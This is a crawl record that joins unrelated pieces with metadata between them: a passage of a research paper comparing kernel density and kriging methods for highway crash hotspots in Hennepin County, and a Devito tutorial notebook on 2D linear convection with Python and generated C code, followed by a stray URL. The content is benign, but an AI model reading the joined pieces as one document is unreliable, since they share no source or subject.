for identifying actual locations of crashes. A smaller cell may be more prone to the problem of producing inaccurate crash statistics, while a larger cell may likely exhibit a loss of detailed information. Most importantly, as one of our objectives is to compare the performance of the two methods, a selection of the equal-sized cell was essential to enforce a fare comparison. A further explanation on selecting a cell size is further discussed in Sect.  4.1. Estimated results obtained from each method represent a quantitative measure of a risk level reflecting the magnitude of the potential to crash occurrence. Thus, a road section with a larger value indicates that there is a higher chance of crashes than that with a lower value. A risk level along the highways was classified into 10 different levels using a quantile classification method. In this method, the entire set of estimated grid cells (ordered in respect of estimated values) was divided into ten groups with each group having an equal number of cells. Then, the top-most level (i.e., level 10) representing the highest risk highway sections was selected as hotspots. Finally, the selected two estimation methods (i.e., KDE and kriging methods) were compared using prediction accuracy index and ranking process. Details specific to the proposed methods are explained in the following sections. ### 4.1 Method I: Kernel density The KDE, a non-parametric approach, is one of the most common used and well-established spatial techniques used to estimate the crash intensity for hotspot identification [ 913]. In this method, a circular search area defined by a kernel function is placed over each crash (discrete points) resulting in individual smooth and continuous crash density surface (see Eq. ( 1) and Fig.  6 for 2D visualization).Then, a grid of cells is overlaid over the study area. For a given cell, density is estimated by summing the overlapping density surface resulted from each crash point. This procedure is repeated for all reference grid cells. Note that kernel functions are symmetrical mathematical functions. $$f(x,y) = \sum\limits_{i = 1}^{n} {\frac{1}{{n \times 2 \times \pi h^{2} }}} \times W_{i} \times K\left( {\frac{{d_{i} }}{h}} \right),$$ (1) where f( x, y) is the density estimate at the location ( x,y) ; n is the number of observations; h is the bandwidth; K is the kernel function and d i is the distance between the location ( x, y) and the ith observation; and W i is the intensity of the observation. For the crash count, W i is unit, whereas this may vary when we consider different weights for different severities of crashes. There is a wide choice of kernel functions such as normal, uniform, quartic, epanichnikov, and triagular. Among them, the most popular is normal [ 16, 17] used in CrimeStat and quartic functions [ 20] used in ArcGIS. According to Silverman [ 27], the selection of kernel function is less sensitive to the outcomes. In our study, we initially considered normal and quartic kernels using bandwidth of 400 and 800 m to estimate the density for all crash cases. As shown in Fig.  7, a general pattern of density estimation represented by the color-coded map appears to be very much similar. For example, if we look at the highest risk zones in red, they appear to be very similar. With this supportive information, we choose to consider normal kernel for the rest of the KDE estimations. Note that CrimeStat and Arcmap were used as the GIS platform for the analysis. The two main parameters which affect the KDE are bandwidth and cell size. The output of KDE is presented in a raster format consisting of a grid of cells. Intuitively, the size of cell has to be reasonable to represent crash cluster occurring in reality. The selection of size is also a trade-off between the computation time, sample size, and the information to retain. Having larger grid cell size saves the processing time; however, the information is likely to be averaged in a larger area, thus resulting in loss of information. Meanwhile, too small grid cell size increases the computation time. Also, a lower level of granularity may not be necessary from the aspect of designing a safety program. Considering safety treatments for a reasonable length of section and keeping some space for the potential inaccuracy in geocoding of the crash location, 400 m of grid cell was used. Sizes could vary from one study to another (e.g., Anderson [ 11] used 100 m; Erdogan et al. [ 10] used 500 m; Blazquez and Celis [ 12] used 100 m). Another important parameter in the KDE method is the selection of bandwidth which determines the extent of search area. Depending on the type of kernel estimate used, this interval has a slightly different meaning. For the normal kernel function, the bandwidth is the standard deviation of the normal distribution. For the uniform, quartic, triangular kernels, the bandwidth is the radius of the search area to be interpolated. The choice of bandwidth is quite subjective [ 11, 28, 29]. Typically, a narrower bandwidth interval will lead to a finer mesh density estimate with all the peaks and valleys detected, whereas a larger bandwidth interval will lead to a smoother distribution and, therefore, detect less variability between areas. While smaller bandwidths show greater differentiation among areas, one has to keep in mind the statistical precision of the estimate. Brimicombe [ 30] suggested that the bandwidth to be 6, 9, or 12 times the median of nearest neighbor distance. 1 In general, it is a good idea to experiment with different fixed intervals to see which results make the most sense [ 28]. Previous researchers have used values ranging from 20 to 1,000 m (e.g., Xie and Ya [ 22] used 20, 100, 250, and 500 m; Ha and Thil [ 23] used 400 and 800 m; Erdogan et al. [ 10] used 500 m; Keskin et al. [ 13] used 200 m; Blazquez and Celis [ 13] used 1,000 m). In our study, we considered two different bandwidth values, i.e., 400 and 800 m (equal and double the cell size). It is reasonable to consider that the correlation of crashes within a short length of 200 m on either side exists (i.e., 200 m on either sides of road section means total section length of 400 m). Moreover, 800 m was used to study the sensitivity bandwidth in the hotspots pattern. ### 4.2 Method II: Kriging Kriging is a generic term coined by geostatisticians for a family of generalized least squares regression algorithms in recognition of the pioneering work of a mining engineer, Danie Krige [ 31]. The main idea behind kriging is that the predicted outputs are weighted average of sample data, and the weights are determined in such a way that they are unique to each predicted point and a function of the separation distance (lag) between the observed location and the location to be predicted. In other words, kriging provides estimates at unknown locations based on a set of available observations by characterizing and quantifying spatial variability of the area of interest. Let x and x i be location vectors for estimation point and a set of observations at known locations, respectively, with i = 1,… n. In this study, x indicates a single point/location where a number of crashes likely to occur is estimated using nearby observations, x i . Based on n number of available crash frequencies, we are interested in estimating a number of crashes at any given location, denoted by $$\hat{Z}(x)$$. The expression of a general kriging model is as follows [ 32]: $$\hat{Z}(x) = m(x) + \sum\limits_{i = 1}^{n} {\lambda_{i} } [Z(x_{i} ) - m(x_{i} )],$$ (2) where m( x) and m( x i ) are expected values of the random variables Z( x) and Z( x i ), and λ i is a kriging weight assigned to datum Z( x i ) for estimation of a crash frequency at any location x. The random field, Z( x), can be decomposed into two components namely residual component R( x) and a trend component m( x), and expressed as Z( x) =  R( x) +  m( x). Each of three main variants of kriging namely simple kriging (SK), ordinary kriging (OK), and universal kriging (UK) can be distinguished according to the model considered for the trend component, m( x). The most widely used kriging approach, OK, assumes the constant mean over each local neighboring area, whereas SK assumes a constant mean over the entire study area, a characteristic that often limits the wide application. UK is a hybrid method which is based on point observations and regression of the target variable on spatially exhaustive auxiliary information [ 25]. In our analysis, OK was used as it is relatively simple yet powerful and less data intensive. As mentioned previously, a fundamental assumption for geostatistical methods is the existence of spatial autocorrelation. The investigation of autocorrelation is essential in most geostatistical analyses that are done by modeling the spatial dissimilarities (semivariogram) based on the available sampling of the attribute of interest [ 24]. A most commonly adopted tool for capturing the spatial data that exhibit weak stationarity is semivariogram given in Eq. ( 3). $$\hat{\gamma }(h) = \frac{1}{2n(h)}\sum\limits_{i = 1}^{n(h)} {[Z(x_{i} + h)} - Z(x_{i} )]^{2} ,$$ (3) where $$\hat{\gamma }(h)$$ is the sample semivariogram, z( x i ) is a crash frequency measurement taken at location x i , and n( h) is the number of pairs of available crash frequency observations separated by the lag distance h. Typically, a mathematical model is utilized to describe the sample semivariances, and a few examples of those are exponential, Gaussian, and spherical models. Esri’s ArcGIS 10.2 comes equipped with a geostatistical analyst package that offers a user-friendly kriging interpolation tool. OK is utilized to obtain the interpolated surface for all data with different temporal units at an aggregation level of 400 m 2. The extensive amount of heuristic trial and error is carried out to ensure that the semivariogram model and the parameters selected produce unbiased results (i.e., the mean prediction error should be close to 0, while the RMSE should be close to 1). There are several parameters that need to be carefully determined when constructing a semivariogram model and some are sill, range, and nugget. Sill represents the level of the plateau (if it exists), while range represents the distance where the semivariogram reaches the sill, also commonly interpreted as degree of spatial correlation. Nugget represents that there is to account micro-scale variation and measurement errors or any spatial variability that exists at a distance smaller than the shortest distance of two measurements. For more information on how to build a good semivariogram model, readers are advised to refer to a comprehensive work done by Olea [ 33]. ### 4.3 Hotspots selection criteria After estimating the number of crashes over the grid cells, the outputs are presented in a color coded map. In both the methods, the estimation takes place over the entire study region. Those areas without the road network are likely to have mostly zero values except regions which are very close to the network. Meanwhile, those areas outside of networks are not of an interest. Such areas are discarded by extracting the results lying only within a buffer of 400 m on each side of highways. This particular value was selected as to make sure that all the grid cells of 400 by 400 m in the vicinity of highways are included. Note that only the major roads under the jurisdiction of Minnesota Department of Transportation in Hennepin County have been considered in this study. The next step is selecting a set of high-risk zones (i.e., the hotspots). There is no universal rule or threshold values to benchmark for what should be the hotspots. It is an arbitrary selection of a cutting off value that screens relatively higher risk areas over the given study area. An example of this value could be considering an overall average of the estimated output [ 6]. When the estimated value for a given location is higher than this threshold value, then it is considered as hotspot. However, in a real world, this could be decided based on budget availability. Another alternative method, which is used in this study, is using quantile method where we classify the estimated values in different classes. For this, we pick a certain number of classes to be created, and then the data are distributed equally between the classes resulting into equal numbers of grid cells in each class [ 9, 34]. Note that in both the methods we use the same grid cell size (i.e., 400 by 400 m 2), thus controlling the numbers of total cells for the comparison. Each class represents the order of severity based on crash risk level. We label these categories as risk level 1, risk level 2, and so on. “Hotspot” is then determined by the top thematic risk level, i.e., level 10. As we are comparing the performance of KDE and kriging method with different output units, this approach makes a fair comparison from the perspective of consistency in hotspot coverage. ### 4.4 Comparisons Prediction accuracy index (PAI) developed by Chainey et al. [ 34] was used as a performance measure to compare the performance of the two proposed methods (see Eq. ( 4)). This was initially developed in crime mapping context [ 34, 35, 37] and has been used in road safety as well [ 18]. Here, we have made a slight modification in the denominator using length of road segment instead of using its area. This is reasonable as highway network is better represented by a linear 1-D feature rather than a 2-D feature. Meanwhile, we also calculated the PAI in terms of area: $${\text{PAI}} = \frac{{\frac{n}{N} \times 100}}{{\frac{m}{M} \times 100}} ,$$ (4) where n is the number of crash in hotspots, N is the total number of crashes, m is the length of highway section in hotspots or area covered, and M is the total length of highway section or total area covered. As seen in Eq. ( 4), PAI is a ratio of percentage of crashes occurring within the identified hotspots (say A) to the percentage of area covered by it (say B). Intuitively, the higher the PAI value, the better the performance. Note that one of the reasons for normalizing “ A” by “ B” is that the higher “ A” value may not always necessarily indicate better ability in identifying risk zones without the normalization. For example, say we identify whole region as hotspots (“ B” is 100), which means “ A” is 100, then PAI would have been 100. However, with the normalization by “ B,” PAI index becomes 1, which is reasonable. Moreover, PAI index measures an ability to locate high number of potential crashes in a small area. A convincing example could be, say we have 25 % of crash occurring in hotspots which represents 50 % of total area, similarly 25 % crash in 80 % of area, then PAI values will be 0.5 and 0.31, respectively. Scientifically, we would choose the method that results the first case (i.e., PAI 0.5) as road agencies can allocate resources effectively by mobilizing them on a smaller area in treating high crash potentials. In addition, another measure, which aims to compare the physical locations of hotspots delineated by KDE and kriging, was used to see if their outcomes are similar or different, and investigate if one approach can be used for another. For this comparison, only those hotspot locations commonly identified by both the methods were extracted, and their matching rate was computed with respect to the total area of hotspots. ## 5 Results and discussions Two different geospatial techniques, the KDE and kriging methods, were employed for the hotspot analysis. Figure  8 illustrates the estimated results on a temporal basis using the two methods. For KDE method, two different bandwidths (i.e., 400 and 800 m) were considered to evaluate its sensitivity in the estimation process but only the results for 400 m are presented here due to the limited space. One of the reasons for using 400 m as a minimum spatial unit was to sufficiently cover the size of the predefined grid cell. In other words, a selection of bandwidth less than the size of the grid cell would be worthless for KDE method because its output would eventually be averaged over each grid. Note that in both methods grid cell size of 400 by 400 m was used. The results presented are categorized into ten different levels arranged in an increasing order of risk level, each of which represents 10 % coverage of the total buffered area. This classification in a color-coded map provides a clear visualization of where the crash-prone areas are, for example, increase in the degree of redness indicates higher risk sections. Such crash risk mappings could be a value to engineers and planners in road agencies in making a good decision for planning road safety budget. In general, both the methods showed that the high crash-prone zones are concentrated in the vicinity of Minneapolis city. This is intuitive as the higher level of traffic interactions generates more safety problems. As the highways are extending outward from the core urban areas, the risk level is decreasing. As seen in the figures, this macro-level of visualizing safety risks demonstrates little difference between the methods and temporal units. Further close investigation and comparisons are made by selecting a set of hotspots. Criteria in selecting a set of hotspots may vary across studies, as there is no any universal rule of selection. Whatever the method is, the main controlling idea is to select a set of sections with higher safety risk. In our study, we used a simple quantile method in which the top risk level from the previously mentioned classes of risk levels was selected. We could also use a threshold cutoff value approach where estimated values in each location are compared with a critical value, and the locations exceeding the critical value are screened as hotspots. In such cases, cutoff values could be determined based on statistic of estimated crash over the area, such as mean and standard deviation. Figure  9 presents selected hotspots (i.e., represented by red rectangles) locations using KDE and kriging methods. As observed, the spatial locations of hotspots identified by these two different methods are not identical, and it is important to make a decision of which method performance is better based on their performance evaluation. One of the common approaches of this is done by comparing the actual values against estimated results. However, unlike in classical statistical modeling method (e.g., using NB Models) which commonly uses this approach, it is not straightforward with geostatistical techniques. For example, in KDE method, we estimate the density of crashes. As a result, it is not convenient to evaluate its performance by comparing output results (density) against its corresponding actual (count) values. Most importantly, as we are comparing two methods, a common measure is needed. This was addressed by adopting a performance measure, i.e., PAI, which was initially proposed by Chainey et al. [ 34]. Table  1 presents a comparison between these two methods in terms of PAI using both the length of highway section and buffer area coverage. A slight variation in hotspot location is observed among different times of day, suggesting that the hotspots may vary by the times of day. Comparatively, most of the hotspots are located around intersections and interchanges in both the methods; however, the hotspots from the kriging method are a little spread out. In all the cases, kriging method has higher PAI values compared to the KDE method. As explained in Sect.  4.4, higher PAI value indicates better ability of a method to locate high potential crash in a small area, which practically helps road agencies to efficiently mobilize limited resource. With this evidence of PAI values, kriging method is better performing compared to KDE. Meanwhile, this method of identifying hotspots could be concluded better in future by comparing with the statistical modeling approach. A similar hotspot pattern was observed with both the bandwidths in KDE method as presented in Table  1 (only output map for 400 m is reported). The results obtained from both the bandwidths were comparable, showing less sensitivity in the selected values as shown in Fig.  10. Table 1 Performance comparisons of KDE and kriging methods Time-of-day No. of crashes in hotspot Total crashes Length of highway (km, two way) Area coverage (km 2) PAI (length) PAI (area) KDE method (Bandwidth 400 m) All crash 14,239 38,748 107.04 16.32 2.75 3.69 MP crash 1,611 5,331 88.17 13.76 2.74 3.60 EP crash 2,700 7,712 82.79 13.28 3.38 4.32 OP crash 9,376 25,705 102.27 15.68 2.85 3.81 Total (T) & Avg. (A) 799.67 (T) 163.96 (T) 2.93 (A) 3.86 (A) KDE method (Bandwidth 800 m) All crash 12,504 38,748 94.70 15.36 2.72 3.44 MP crash 1,175 5,331 82.89 11.84 2.13 3.05 EP crash 2,252 7,712 75.04 12.00 3.11 3.99 OP crash 8,146 25,705 89.26 14.24 2.84 3.65 Total (T) & Avg. (A) 799.67 (T) 163.96 (T) 2.7 (A) 3.53 (A) Kriging method All crash 14,839 38,748 100.62 14.88 3.04 4.22 MP crash 1,907 5,331 106.61 15.36 2.68 3.82 EP crash 3,558 7,712 108.71 16.00 3.39 4.73 OP crash 10,886 25,705 107.17 16.64 3.16 4.17 Total (T) & Avg. (A) 799.67 (T) 163.96 (T) 3.07 (A) 4.23 (A) The area coverage is not exactly 10 % due to loss of some cell sections during GIS processing In addition, another bandwidth (i.e., 800 m) was tested to check the sensitivity of different bandwidths but only a small difference was observed in their performance. For example, as shown in Table  1, the PAI (length) value for all crash case for 400 m bandwidth, the PAI index was found to be 2.75, while a comparative value of 2.72 was found for 800 m bandwidth. The magnitude of their difference is very marginal (i.e., 1.09 %). A similar trend was also observed when compared with other times of day as presented in Fig.  10. From this, it can be asserted that the PAI index seems to be higher when a smaller bandwidth is implemented irrespective of time-of-day. This also shows that a further analysis testing the sensitivity of different bandwidth sizes may not be necessary for comparison with the kriging method. Note that the total areas of the selected hotspots are not exactly the same (see Table  1) but this small discrepancy is caused during GIS data processing. However, this minor issue pertaining to an insignificant discrepancy in the total area does not affect the resulting PAI indexes as they were calculated using the normalized numerical figures (refer to Eq. ( 4)). As outlined previously, the hotspots identified by the two methods are compared by matching their physical locations for all four temporal groups. The intent of this non-performance-oriented comparison is to see if there exists a high (or low) match between the outcomes of the two methods, and investigate the feasibility of using one approach over another. The findings showed that the matching rates between the outcomes of kriging and KDE with 400 m bandwidth were found to be 52 %, 75 %, 66 %, and 71 % for All, MP, EP, and OP crash groups, respectively. This clearly suggests that there exist significant discrepancies between the two methods in identifying common hotspots. Similarly, matching rates using KDE with bandwidth 800 m were 45 %, 77 %, 62 %, and 69 % for All, MP, EP, and OP crash groups, respectively. Note that the comparison outcomes using two different bandwidths in KDE method were found comparable. The above findings can be interpreted as follows: first, the average matching rate of 65 % indicates that the outcomes of the two test methods experience significant difference, suggesting that one method may not be used as a replacement of another. Moreover, as the PAI measures indicate that kriging method has better performance compared to KDE, we may conclude that kriging method, which is less explored in road safety, could be one of the potential methods in hotspots analysis. However, an open research question raises about which methods would produce more accurate results, should the reliability and credibility of the PAI index be questioned. Therefore, a further investigation is of high necessity to assert. ## 6 Conclusions and recommendations This paper describes a comparative analysis on two geostatistical-based approaches for estimating the expected collision frequency of individual road sections and identifying crash hotspots in a highway network. In contrast to the widely adopted safety model-based approach, a geostatistical-based hotspot identification method is less data intensive and easier to implement, as it does not require extensive information about the underlying road network such as road geometry and traffic volume. The two geostatistical methods considered in this analysis are called KDE and kriging. The KDE approach has been applied in a few prior road safety studies while kriging, one of the least explored methods in road safety studies, was introduced in this research as a promising alternative because of its advantages in handling spatially autocorrelated datasets and success in other applications. The two methods were compared in a case study for identifying crash hotspots in the road network of the Hennepin County, Minnesota. Five years of historical crash data, which were aggregated by different times of day, were used for geostatistically inferring the spatial distribution of the expected crash frequency using the two methods. The estimated crash frequencies were then used for subsequent hotspot identification, and the identification results were then compared using two criteria, namely PAI and  percentage difference in hotspots identified. It was found that, according to the PAI criterion, kriging is superior in its ability to pinpoint the hotspots than that of the KDE. A comparison on hotspot ranking indicates that the two methods have resulted in moderately different lists of hotspots. Regardless of the credibility of the evaluation criteria, it is worthwhile to note that kriging, which has seldom been used for road safety analysis, was shown to be a promising technique. The findings suggest that a further investigation is required to achieve more definite conclusions. This research can be further extended to several directions to overcome a few limitations of the study conducted herein. First, a further investigation is needed to address the issue of how to incorporate the severity of individual crash data in hotspot identification. Second, instead of using the PAI measure, the performance of kriging can be benchmarked with the outcomes from the conventional crash model-based approach. Third, if we have historical geocoded data for potential crash influencing factors such as traffic exposure and weather conditions, we could apply universal kriging method and identify if these factors make significant contribution to hotspots. Such weather-related crash studies could be valuable for road agencies, especially in cold countries, for planning proactive winter road maintenance. ## Acknowledgments The authors wish to acknowledge Jakin Koll and Curt Pape at the Minnesota Department of Transportation for providing the data that are used in this study. This research was partially funded by the Aurora Program and National Sciences and Engineering Research Council of Canada (NSERC). Open AccessThis article is distributed under the terms of the Creative Commons Attribution License which permits any use, distribution, and reproduction in any medium, provided the original author(s) and the source are credited. Footnotes 1 Nearest neighbor distance is the distance from each point of event to its nearest neighbor. Literatur Über diesen Artikel Zur Ausgabe ## Premium Partner Bildnachweise
2021-04-14 06:27:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 2, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.632171630859375, "perplexity": 1184.646517684662}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038076819.36/warc/CC-MAIN-20210414034544-20210414064544-00034.warc.gz"}
https://nbviewer.jupyter.org/github/opesci/devito/blob/master/examples/cfd/01_convection_revisited.ipynb
### Example 1b: Linear convection in 2D, revisited¶ We will now revisit the first example of this tutorial with an example that is better suited to the numerical scheme used in Devito. As a reminder, the governing equation is: $$\frac{\partial u}{\partial t}+c\frac{\partial u}{\partial x} + c\frac{\partial u}{\partial y} = 0$$ We then discretized this using forward differences in time and backward differences in space: $$u_{i,j}^{n+1} = u_{i,j}^n-c \frac{\Delta t}{\Delta x}(u_{i,j}^n-u_{i-1,j}^n)-c \frac{\Delta t}{\Delta y}(u_{i,j}^n-u_{i,j-1}^n)$$ In the previous example, the system was initialised with a hat function. As easy as this example seems, it actually highlights a few limitations of finite differences and related methods: • The governing equation above contains spatial derivatives ($\frac{\partial u}{\partial x}$ and $\frac{\partial u}{\partial y}$). The hat, with its sharp corners, is discontinuous and therefore non-smooth, meaning that the derivatives do not exist at the corners of the hat. This means that the governing equation has no solution in the strict sense for this problem. Mathematically, this problem can be overcome by introducing weak solutions, which still exist in the presence of discontinuities, as long as the problem is smooth almost everywhere. The Finite Volume (FV), Finite Element (FEM) and related schemes are based on this weak form. • The finite differences method only works well if finite differences are a good approximation of the derivatives. With the chosen discretisation above, this requires that $\frac{u_{i,j}^n-u_{i-1,j}^n}{\Delta x} \approx \frac{\partial u}{\partial x}$ and $\frac{u_{i,j}^n-u_{i,j-1}^n}{\Delta y} \approx \frac{\partial u}{\partial y}$. This is the case for systems with a smooth solution if $\Delta x$ and $\Delta y$ are sufficiently small. But if the solution is non-smooth, as in this example, then we can't expect much regardless of the grid size. • First-order methods, such as the backward differences that we have used in this exampe, are known to create artificial diffusion. Higher-order schemes, such as central differences, avoid this problem. However, in the presence of discontinuities these methods introduce so-called spurious oscillations. These oscillations may even build up (grow infinitely) and cause the computation to diverge. • Discontinuities can appear by themselves for some equations (such as the Burgers equation that we discuss next), even if the intial condition is smooth. In CFD, discontinuities appear for example as shocks in the simulation of transonic flow. For this reason, numerical schemes that behave well in the presence of discontinuities have been a research subject for a long time. A thorough discussion is beyond the scope of this tutorial, but can be found in [R. LeVeque (1992): Numerical Methods for Conservation Laws, 2nd ed., Birkhäuser Verlag, pp. 8-13]. In the remainder of this example, we will reproduce the results from the previous example, only this time with a smooth initial condition. This lets us observe Devito in a setting for which it is better equipped. In [1]: from examples.cfd import plot_field, init_hat, init_smooth import numpy as np %matplotlib inline # Some variable declarations nx = 81 ny = 81 nt = 100 c = 1. dx = 2. / (nx - 1) dy = 2. / (ny - 1) sigma = .2 dt = sigma * dx Let us now initialise the field with an infinitely smooth bump, as given by [J.A. Krakos (2012): Unsteady Adjoint Analysis for Output Sensitivity and Mesh Adaptation, PhD thesis, p. 68] as $$f(r)= \begin{cases} \frac{1}{A}e^{-1/(r-r^2)} &\text{ for } 0 < r < 1,\\ 0 &\text{ else.} \end{cases}$$ We use this with $A=100$, and define the initial condition in two dimensions as $$u^0(x,y)=1+f\left(\frac{2}{3}x\right)*f\left(\frac{2}{3}y\right).$$ In [2]: #NBVAL_IGNORE_OUTPUT u = np.empty((nx, ny)) init_smooth(field=u, dx=dx, dy=dy) # Plot initial condition plot_field(u, zmax=4) Solving this will move the bump again. In [3]: # Repeat initialisation, so we can re-run the cell init_smooth(field=u, dx=dx, dy=dy) for n in range(nt + 1): # Copy previous result into a new buffer un = u.copy() # Update the new result with a 3-point stencil u[1:, 1:] = (un[1:, 1:] - (c * dt / dx * (un[1:, 1:] - un[1:, :-1])) - (c * dt / dy * (un[1:, 1:] - un[:-1, 1:]))) # Apply boundary conditions u[0, :] = 1. u[-1, :] = 1. u[:, 0] = 1. u[:, -1] = 1. In [4]: #NBVAL_IGNORE_OUTPUT # A small sanity check for auto-testing assert (u[45:55, 45:55] > 1.8).all() u_ref = u.copy() plot_field(u, zmax=4.) Hooray, the wave moved! It looks like the solver works much better for this example: The wave has not noticeably changed its shape. #### Devito implementation¶ Again, we can re-create this via a Devito operator. Let's fill the initial buffer with smooth data and look at it: In [5]: #NBVAL_IGNORE_OUTPUT from devito import Grid, TimeFunction grid = Grid(shape=(nx, ny), extent=(2., 2.)) u = TimeFunction(name='u', grid=grid) init_smooth(field=u.data[0], dx=dx, dy=dy) plot_field(u.data[0]) We create again the discretised equation as shown below. Note that the equation is still the same, only the initial condition has changed. In [6]: from devito import Eq eq = Eq(u.dt + c*u.dxl + c*u.dyl) print(eq) Eq(1.0*u(t, x, y)/h_y - 1.0*u(t, x, y - h_y)/h_y + 1.0*u(t, x, y)/h_x - 1.0*u(t, x - h_x, y)/h_x - u(t, x, y)/dt + u(t + dt, x, y)/dt, 0) SymPy can re-organise this equation just like in the previous example. In [7]: from devito import solve stencil = solve(eq, u.forward) print(stencil) -1.0*dt*u(t, x, y)/h_y + 1.0*dt*u(t, x, y - h_y)/h_y - 1.0*dt*u(t, x, y)/h_x + 1.0*dt*u(t, x - h_x, y)/h_x + u(t, x, y) We can now use this stencil expression to create an operator to apply to our data object: In [8]: #NBVAL_IGNORE_OUTPUT from devito import Operator # Reset our initial condition in both buffers. # This is required to avoid 0s propagating into # our solution, which has a background value of 1. init_smooth(field=u.data[0], dx=dx, dy=dy) init_smooth(field=u.data[1], dx=dx, dy=dy) # Apply boundary conditions u.data[:, 0, :] = 1. u.data[:, -1, :] = 1. u.data[:, :, 0] = 1. u.data[:, :, -1] = 1. # Create an Operator that updates the forward stencil # point in the interior subdomain only. op = Operator(Eq(u.forward, stencil, subdomain=grid.interior)) # Apply the operator for a number of timesteps op(time=nt, dt=dt) plot_field(u.data[0, :, :]) # Some small sanity checks for the testing framework assert (u.data[0, 45:55, 45:55] > 1.8).all() assert np.allclose(u.data[0], u_ref, rtol=3.e-2) Operator Kernel run in 0.00 s Again, this looks just like the result from NumPy. Since this example is just like the one before, the low-level treatment of boundaries is also unchanged. In [9]: #NBVAL_IGNORE_OUTPUT # Reset our data field and ICs in both buffers init_smooth(field=u.data[0], dx=dx, dy=dy) init_smooth(field=u.data[1], dx=dx, dy=dy) # For defining BCs, we generally to explicitly set rows/columns # in our field using an expression. We can use Devito's "indexed" # notation to do this: x, y = grid.dimensions t = grid.stepping_dim bc_left = Eq(u[t + 1, 0, y], 1.) bc_right = Eq(u[t + 1, nx-1, y], 1.) bc_top = Eq(u[t + 1, x, ny-1], 1.) bc_bottom = Eq(u[t + 1, x, 0], 1.) # Now combine the BC expressions with the stencil to form operator. expressions = [Eq(u.forward, stencil, subdomain=grid.interior)] expressions += [bc_left, bc_right, bc_top, bc_bottom] op = Operator(expressions=expressions, dle=None, dse=None) # <-- Turn off performance optimisations op(time=nt, dt=dt) plot_field(u.data[0, :, :]) # Some small sanity checks for the testing framework assert (u.data[0, 45:55, 45:55] > 1.8).all() assert np.allclose(u.data[0], u_ref, rtol=3.e-2) Operator Kernel run in 0.00 s The C code of the Kernel is also still the same. In [10]: print(op.ccode) #define _POSIX_C_SOURCE 200809L #include "stdlib.h" #include "math.h" #include "sys/time.h" struct dataobj { void *restrict data; int * size; int * npsize; int * dsize; int * hsize; int * hofs; int * oofs; } ; struct profiler { double section0; double section1; double section2; } ; int Kernel(const float dt, const float h_x, const float h_y, struct dataobj *restrict u_vec, const int time_M, const int time_m, struct profiler * timers, const int x_M, const int x_m, const int xi_ltkn, const int xi_rtkn, const int y_M, const int y_m, const int yi_ltkn, const int yi_rtkn) { float (*restrict u)[u_vec->size[1]][u_vec->size[2]] __attribute__ ((aligned (64))) = (float (*)[u_vec->size[1]][u_vec->size[2]]) u_vec->data; for (int time = time_m, t0 = (time)%(2), t1 = (time + 1)%(2); time <= time_M; time += 1, t0 = (time)%(2), t1 = (time + 1)%(2)) { struct timeval start_section0, end_section0; gettimeofday(&start_section0, NULL); for (int xi = x_m + xi_ltkn; xi <= x_M - xi_rtkn; xi += 1) { for (int yi = y_m + yi_ltkn; yi <= y_M - yi_rtkn; yi += 1) { u[t1][xi + 1][yi + 1] = 1.0F*dt*u[t0][xi + 1][yi]/h_y - 1.0F*dt*u[t0][xi + 1][yi + 1]/h_y + 1.0F*dt*u[t0][xi][yi + 1]/h_x - 1.0F*dt*u[t0][xi + 1][yi + 1]/h_x + u[t0][xi + 1][yi + 1]; } } gettimeofday(&end_section0, NULL); timers->section0 += (double)(end_section0.tv_sec-start_section0.tv_sec)+(double)(end_section0.tv_usec-start_section0.tv_usec)/1000000; struct timeval start_section1, end_section1; gettimeofday(&start_section1, NULL); for (int y = y_m; y <= y_M; y += 1) { u[t1][1][y + 1] = 1.00000000000000F; u[t1][81][y + 1] = 1.00000000000000F; } gettimeofday(&end_section1, NULL); timers->section1 += (double)(end_section1.tv_sec-start_section1.tv_sec)+(double)(end_section1.tv_usec-start_section1.tv_usec)/1000000; struct timeval start_section2, end_section2; gettimeofday(&start_section2, NULL); for (int x = x_m; x <= x_M; x += 1) { u[t1][x + 1][81] = 1.00000000000000F; u[t1][x + 1][1] = 1.00000000000000F; } gettimeofday(&end_section2, NULL); timers->section2 += (double)(end_section2.tv_sec-start_section2.tv_sec)+(double)(end_section2.tv_usec-start_section2.tv_usec)/1000000; } return 0; }
2019-02-24 04:17:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5059828162193298, "perplexity": 7009.871405002016}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550249578748.86/warc/CC-MAIN-20190224023850-20190224045850-00297.warc.gz"}
https://math.stackexchange.com/questions/1760579/minimum-number-of-marked-squares-on-n-%C3%97-n-board
